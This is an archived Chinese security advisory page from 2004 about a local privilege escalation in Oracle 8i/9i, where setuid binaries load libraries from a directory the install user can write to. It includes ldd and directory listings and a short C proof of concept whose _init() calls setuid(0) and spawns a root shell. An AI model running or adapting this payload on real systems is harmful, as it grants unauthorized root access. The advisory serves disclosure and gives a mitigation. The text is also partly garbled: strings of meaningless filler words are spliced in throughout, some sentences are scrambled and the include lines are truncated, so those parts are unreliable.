首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
多个Oralce产品本地权限提升漏洞
来源:vfocus.net 作者:vfocus 发布时间:2004-08-03  

多个Oralce产品本地权限提升漏洞

受影响系统:
Oracle Oracle8i Standard Edition 9.2 .0.2
Oracle Oracle8i Standard Edition 9.2 .0.1
Oracle Oracle8i Standard Edition 9.0.2
Oracle Oracle8i Standard Edition 9.0.1 .4
Oracle Oracle8i Standard Edition 9.0.1 .3
Oracle Oracle8i Standard Edition 9.0.1 .2
Oracle Oracle8i Standard Edition 9.0.1
Oracle Oracle8i Standard Edition 9.0
Oracle Oracle8i Standard Edition 8.1.7 .4
Oracle Oracle8i Standard Edition 8.1.7 .1
Oracle Oracle8i Standard Edition 8.1.7 .0.0
Oracle Oracle8i Standard Edition 8.1.7
Oracle Oracle8i Standard Edition 8.1.6
Oracle Oracle8i Standard Edition 8.1.5
Oracle Oracle8i Personal Edition 9.2 .0.2
Oracle Oracle8i Personal Edition 9.2 .0.1
Oracle Oracle8i Personal Edition 9.0.1
Oracle Oracle8i Enterprise Edition 9.2 .0.2
Oracle Oracle8i Enterprise Edition 9.2 .0.1
Oracle Oracle8i Enterprise Edition 9.0.1
Oracle Oracle8i Enterprise Edition 8.1.7 .1.0
Oracle Oracle8i Enterprise Edition 8.1.7 .0.0
Oracle Oracle8i Enterprise Edition 8.1.6 .1.0
Oracle Oracle8i Enterprise Edition 8.1.6 .0.0
Oracle Oracle8i Enterprise Edition 8.1.5 .1.0
Oracle Oracle8i Enterprise Edition 8.1.5 .0.2
Oracle Oracle8i Enterprise Edition 8.1.5 .0.0
Oracle Oracle8i Client Edition 9.2 .0.2
Oracle Oracle8i Client Edition 9.2 .0.1
Oracle Oracle8i 9.0.1
Oracle Oracle8i 9.0
Oracle Oracle8i 8.1.7.1
Oracle Oracle8i 8.1.7
Oracle Oracle8i 8.1.6
Oracle Oracle8i 8.1.5
Oracle Oracle8i 8.0.6
Oracle Oracle8i 8.0.5
Oracle Oracle8i 8.0.4
Oracle Oracle8i 8.0.2
Oracle Oracle8i 8.0.1
Oracle Oracle9i Standard Edition 9.2.0.4
Oracle Oracle9i Standard Edition 9.2.0.1
Oracle Oracle9i Release 2 9.2.2
Oracle Oracle9i Release 2 9.2.1
Oracle Oracle9i Personal Edition 9.2.0.4
Oracle Oracle9i Personal Edition 9.2.0.1
Oracle Oracle9i Enterprise Edition 9.2.0.4
Oracle Oracle9i Enterprise Edition 9.2.0.1
Oracle Oracle9i 9.2.0.3
Oracle Oracle9i 9.2.0.2
Oracle Oracle9i 9.2.0.1
Oracle Oracle9i 9.2
Oracle Oracle9i 9.0.2
Oracle Oracle9i 9.0.1.4
Oracle Oracle9i 9.0.1.3
Oracle Oracle9i 9.0.1.2
Oracle Oracle9i 9.0.1
Oracle Oracle9i 9.0
描述:
--------------------------------------------------------------------------------
Oracle是一种强大的企业级库。
服务 ,补丁绿升级 盟 拒绝服务。科缓冲缓冲技攻击病毒,补丁漏服务安全洞崩溃拒绝的溢出库崩溃的拒绝服务的
Oracle不正确对lib库目录进行限制,本地攻击者可以利用这个进行提升攻击。
程序缓冲绿数据,盟安全。,程序病毒科 攻击病毒补丁技升级病毒厂商漏的数据缓冲安全程序洞溢出拒绝的程序补丁库 程序程序程序
部分setuid属性的应用程序如'/bin/dbsnmp'、'/bin/nmo'以如下方法调用共享库,如:
程序程序数据补丁。绿厂商升级。补丁盟 升级科数据安全数据技厂商安全漏 攻击厂商洞厂商,库程序服务
[iasr2@dimoniet ora9ias_mid]$ ldd ./bin/dbsnmp
libvppdc.so => /export/home/iasr2/ora9ias_mid/lib/libvppdc.so
libclntsh.so.9.0 => /export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0
libwtc9.so => /export/home/iasr2/ora9ias_mid/lib//libwtc9.so
libthread.so.1 => /usr/lib/libthread.so.1
libkstat.so.1 => /usr/lib/libkstat.so.1
....
程序程序数据补丁。绿厂商升级。补丁盟 升级科数据安全数据技厂商安全漏 攻击厂商洞厂商,库程序服务
[iasr2@dimoniet ora9ias_mid]$ ldd ./bin/nmo
libnsl.so.1 => /usr/lib/libnsl.so.1
libsocket.so.1 => /usr/lib/libsocket.so.1
libgen.so.1 => /usr/lib/libgen.so.1
.....

但是lib目录却为iasr2可写:
程序程序数据补丁。绿厂商升级。补丁盟 升级科数据安全数据技厂商安全漏 攻击厂商洞厂商,库程序服务
[pask@dimoniet home]$ ls -alc /export/home/iasr2/ora9ias_mid
...
drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 lbs
drwxr-xr-x 15 iasr2 dba 512 Jan 7 12:13 ldap
drwxr-xr-x 3 iasr2 dba 12800 Nov 21 11:22 lib
drwxr-xr-x 13 iasr2 dba 512 Nov 21 14:04 network
drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 ocommon
...
程序程序数据补丁。绿厂商升级。补丁盟 升级科数据安全数据技厂商安全漏 攻击厂商洞厂商,库程序服务
因此iasr2可以简单地创建,如so.lib:
程序程序数据补丁。绿厂商升级。补丁盟 升级科数据安全数据技厂商安全漏 攻击厂商洞厂商,库程序服务
#include
#include
程序程序数据补丁。绿厂商升级。补丁盟 升级科数据安全数据技厂商安全漏 攻击厂商洞厂商,库程序服务
_init() {
printf("en el _init()\n");
printf("Con PID=%i y EUID=%i",getpid(),getuid());
setuid(0);
system("/usr/bin/ksh");
printf("Saliendo del Init()\n");
}
程序程序数据补丁。绿厂商升级。补丁盟 升级科数据安全数据技厂商安全漏 攻击厂商洞厂商,库程序服务
当受此影响的程序时,可导致恶意库被装载而命令。

<*来源:Juan Manuel Pascual (jmpascual@open3s.com)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=109147677214087&w=2
*>

建议:
--------------------------------------------------------------------------------
临时解决方法:

如果您不能立刻安装或者升级,NSFOCUS建议您采取以下措施以降低威胁:
程序程序数据补丁。绿厂商升级。补丁盟 升级科数据安全数据技厂商安全漏 攻击厂商洞厂商,库程序服务
* 把lib库设置为只有root可写。

厂商:

Oracle
------
目前厂商还没有提供或者升级程序,我们建议使用此软件的随时关注厂商的主页以获取最新版本:
程序程序数据补丁。绿厂商升级。补丁盟 升级科数据安全数据技厂商安全漏 攻击厂商洞厂商,库程序服务
http://www.oracle.com



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·CVSTrac远程任意命令执行漏洞
·PHP-Nuke多个SQL注入及跨站脚本
·Sun Solaris Volume Manager本地
·Gaim MSN协议处理远程缓冲区溢出
·PuTTY/PSCP远程任意指令执行漏洞
·Symantec Brightmail Anti-spam
·Linux Kernel Broadcom 5820 Cry
·乔客论坛惊暴UPfile严重漏洞
·Open WebMail Email头字段HTML代
·HP-UX进程资源管理器本地文件破
·Apache Mod_DAV LOCK远程拒绝服
·Linux Kernel chown()系统调用组
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved